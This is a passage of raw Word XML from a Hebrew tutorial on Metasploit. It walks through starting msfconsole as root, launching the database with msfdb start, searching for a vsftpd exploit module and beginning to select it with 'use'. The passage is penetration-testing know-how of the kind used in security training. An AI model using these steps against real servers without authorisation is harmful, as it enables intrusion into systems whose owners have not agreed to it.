          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00497E2B" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r w:rsidR="00497E2B" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79200EE1" w14:textId="318E2F3E" w:rsidR="00F832AF" w:rsidRPr="007D51BF" w:rsidRDefault="00F832AF" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FE2F32A" w14:textId="25644B6A" w:rsidR="00F832AF" w:rsidRPr="007D51BF" w:rsidRDefault="00F832AF" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E4273C2" w14:textId="465FA860" w:rsidR="000B193E" w:rsidRPr="007D51BF" w:rsidRDefault="000B193E" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ECB4EFA" w14:textId="38A1C06F" w:rsidR="000B193E" w:rsidRPr="007D51BF" w:rsidRDefault="000B193E" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30604694" w14:textId="788076F3" w:rsidR="000B193E" w:rsidRPr="007D51BF" w:rsidRDefault="000B193E" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73604AA6" w14:textId="501CC49B" w:rsidR="000B193E" w:rsidRPr="007D51BF" w:rsidRDefault="000B193E" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AAF4359" w14:textId="30B7B3C1" w:rsidR="000B193E" w:rsidRPr="007D51BF" w:rsidRDefault="000B193E" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="747A5F7E" w14:textId="5E100364" w:rsidR="000B193E" w:rsidRPr="007D51BF" w:rsidRDefault="000B193E" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E1DB598" w14:textId="77777777" w:rsidR="00931C77" w:rsidRPr="007D51BF" w:rsidRDefault="00931C77" w:rsidP="009D3A4F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="114A9A92" w14:textId="77777777" w:rsidR="00931C77" w:rsidRPr="007D51BF" w:rsidRDefault="00931C77" w:rsidP="009D3A4F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="274BF7D9" w14:textId="77777777" w:rsidR="00931C77" w:rsidRPr="007D51BF" w:rsidRDefault="00931C77" w:rsidP="009D3A4F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30E30073" w14:textId="76188FA7" w:rsidR="009D3A4F" w:rsidRPr="007D51BF" w:rsidRDefault="009D3A4F" w:rsidP="009D3A4F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לפני תחילת עבודה עם </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> כדאי לעבור על רשימת הפקדות כדי לכיר אותם ולדעת מה כל אחת עושה.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DB980A" w14:textId="16C31200" w:rsidR="00302563" w:rsidRPr="007D51BF" w:rsidRDefault="009D3A4F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  <w:rtl/>
        </w:rPr>
        <w:t>ל</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfcosole</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> קיים מאגר נתונים גדול המכיל המון חולשות אבטחה. </w:t>
      </w:r>
      <w:r w:rsidR="00BC7A6B" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>כדי</w:t>
      </w:r>
      <w:r w:rsidR="00302563" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> להתחבר ל</w:t>
      </w:r>
      <w:r w:rsidR="00302563" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">database </w:t>
      </w:r>
      <w:r w:rsidR="00302563" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> של </w:t>
      </w:r>
      <w:r w:rsidR="00302563" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r w:rsidR="00302563" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> יש לשים לב לפני </w:t>
      </w:r>
      <w:r w:rsidR="00BC7A6B" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>כשרושמים את הפקודה</w:t>
      </w:r>
      <w:r w:rsidR="00302563" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> חייבים להיות על משתמש </w:t>
      </w:r>
      <w:r w:rsidR="00302563" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E287AB" w14:textId="14787F04" w:rsidR="00302563" w:rsidRPr="007D51BF" w:rsidRDefault="00302563" w:rsidP="00302563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75328" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6B4A4B0D" wp14:editId="192AA0EA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>288289</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2697480" cy="989801"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1270"/>
            <wp:wrapNone/>
            <wp:docPr id="126" name="תמונה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98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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">הפקודה </w:t>
      </w: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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0ACD7FD1" w14:textId="096F8528" w:rsidR="00302563" w:rsidRPr="007D51BF" w:rsidRDefault="00302563" w:rsidP="00302563">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="592F16AD" w14:textId="16594E1C" w:rsidR="00302563" w:rsidRPr="007D51BF" w:rsidRDefault="00302563" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D53000C" w14:textId="40EC09BD" w:rsidR="00302563" w:rsidRPr="007D51BF" w:rsidRDefault="00302563" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FE2EAEA" w14:textId="2686AA45" w:rsidR="00302563" w:rsidRPr="007D51BF" w:rsidRDefault="00302563" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01C969A4" w14:textId="5AFD02DE" w:rsidR="00302563" w:rsidRPr="007D51BF" w:rsidRDefault="00302563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הפקודה להפעלת מאגר הנתונים היא </w:t>
      </w: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msfdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3763D57E" w14:textId="05D05DE7" w:rsidR="00302563" w:rsidRPr="007D51BF" w:rsidRDefault="00302563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וניתן לבדוק סטאטוס אם השרת מחובר עם הפקודה </w:t>
      </w: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msfdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AF1C92" w14:textId="0AFC1484" w:rsidR="00BC7A6B" w:rsidRPr="007D51BF" w:rsidRDefault="00BC7A6B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שם השרת הוא </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B57EBB4" w14:textId="169B8E90" w:rsidR="00302563" w:rsidRPr="007D51BF" w:rsidRDefault="00302563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76352" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="36599A5B" wp14:editId="17D0B82B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3329940" cy="1950720"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="127" name="תמונה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44303" w14:textId="3B5EC900" w:rsidR="00302563" w:rsidRPr="007D51BF" w:rsidRDefault="00302563" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7544C5CF" w14:textId="7786475B" w:rsidR="00302563" w:rsidRPr="007D51BF" w:rsidRDefault="00302563" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55D7A422" w14:textId="449A4502" w:rsidR="00302563" w:rsidRPr="007D51BF" w:rsidRDefault="00302563" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11EE6BB5" w14:textId="02A6BA67" w:rsidR="00302563" w:rsidRPr="007D51BF" w:rsidRDefault="00302563" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5149A502" w14:textId="36F7C54C" w:rsidR="00302563" w:rsidRPr="007D51BF" w:rsidRDefault="00302563" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09069378" w14:textId="77777777" w:rsidR="00931C77" w:rsidRPr="007D51BF" w:rsidRDefault="00931C77" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2288EF13" w14:textId="77777777" w:rsidR="00931C77" w:rsidRPr="007D51BF" w:rsidRDefault="00931C77" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="460417F6" w14:textId="77777777" w:rsidR="00931C77" w:rsidRPr="007D51BF" w:rsidRDefault="00931C77" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04C449D3" w14:textId="77777777" w:rsidR="00931C77" w:rsidRPr="007D51BF" w:rsidRDefault="00931C77" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FB58381" w14:textId="77777777" w:rsidR="00931C77" w:rsidRPr="007D51BF" w:rsidRDefault="00931C77" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C4D3D24" w14:textId="7950E6DC" w:rsidR="00302563" w:rsidRPr="007D51BF" w:rsidRDefault="00302563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lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251877376" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="794CF327" wp14:editId="36AE4ACE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6637020" cy="2049780"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:wrapNone/>
            <wp:docPr id="128" name="תמונה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D15BA" w14:textId="05DF5056" w:rsidR="00302563" w:rsidRPr="007D51BF" w:rsidRDefault="00302563" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="521AC88E" w14:textId="07208346" w:rsidR="00302563" w:rsidRPr="007D51BF" w:rsidRDefault="00302563" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B1857C7" w14:textId="54E7A6DF" w:rsidR="00302563" w:rsidRPr="007D51BF" w:rsidRDefault="00302563" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="599970AE" w14:textId="7D44853B" w:rsidR="00302563" w:rsidRPr="007D51BF" w:rsidRDefault="00302563" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="752A181C" w14:textId="77A23EEF" w:rsidR="00302563" w:rsidRPr="007D51BF" w:rsidRDefault="00302563" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76044835" w14:textId="71DC203D" w:rsidR="00302563" w:rsidRPr="007D51BF" w:rsidRDefault="00302563" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1773267E" w14:textId="77777777" w:rsidR="00302563" w:rsidRPr="007D51BF" w:rsidRDefault="00302563" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59CEB650" w14:textId="43FF4EFB" w:rsidR="00B06C42" w:rsidRPr="007D51BF" w:rsidRDefault="00B06C42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עכשיו נבצע חיפוש לחולשה בשירות </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3485BBA4" w14:textId="1C1BB637" w:rsidR="00F23AA6" w:rsidRPr="007D51BF" w:rsidRDefault="00F23AA6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אפשר להשתמש בפקודה </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E71256A" w14:textId="2B7C4779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79072" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7CDC5737" wp14:editId="2DA32A10">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>7620</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>191770</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6637020" cy="1310640"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">הפקודה: </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>search vsftpd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B52E6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52C1BF31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DD0A738" w14:textId="64C36ACA" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="00F832AF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7E4BFA5" wp14:editId="65B02B94">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4747260</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>43815</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="381000" cy="220980"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="26670"/>
                <wp:wrapNone/>
                <wp:docPr id="121" name="מלבן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EFC34" id="מלבן 121" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:373.8pt;margin-top:3.45pt;width:30pt;height:17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" filled="f" strokecolor="yellow" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AC092D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21D42D40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0C133C76" w14:textId="21C5144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מצאנו את החולשה של השרת שאותו אנחנו רוצים לתקוף</w:t>
      </w:r>
      <w:r w:rsidR="00BC7A6B" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> במקרה הזה מצאנו רק </w:t>
      </w:r>
      <w:r w:rsidR="00BC7A6B" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exploit 1</w:t>
      </w:r>
      <w:r w:rsidR="00BC7A6B" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> אפשר לראות שהדירוג של המודול הזה הוא מצוין זה אומר שההתקפה תצליח במ</w:t>
      </w:r>
      <w:r w:rsidR="009425BF" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>יד</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">ה ואנחנו עושים </w:t>
      </w:r>
      <w:r w:rsidR="009425BF" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>הכל</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> בצורה נכונה.</w:t>
      </w:r>
      <w:r w:rsidR="00F832AF" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> בנוסף חושב לשם לב למספר הגרסה של השירות</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1797AC43" w14:textId="34408E73" w:rsidR="00F832AF" w:rsidRPr="007D51BF" w:rsidRDefault="00F832AF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במידה והגרסה לא תהיה תאומת כנראה ההתקפה לא תצליח זה תקף לכלל המתקפות שאבחן במדריך.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590328CC" w14:textId="0A0AF2F6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עכשיו נסמן את השורה ונעתיק אותה לשורת הפקודה עם הפקודה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
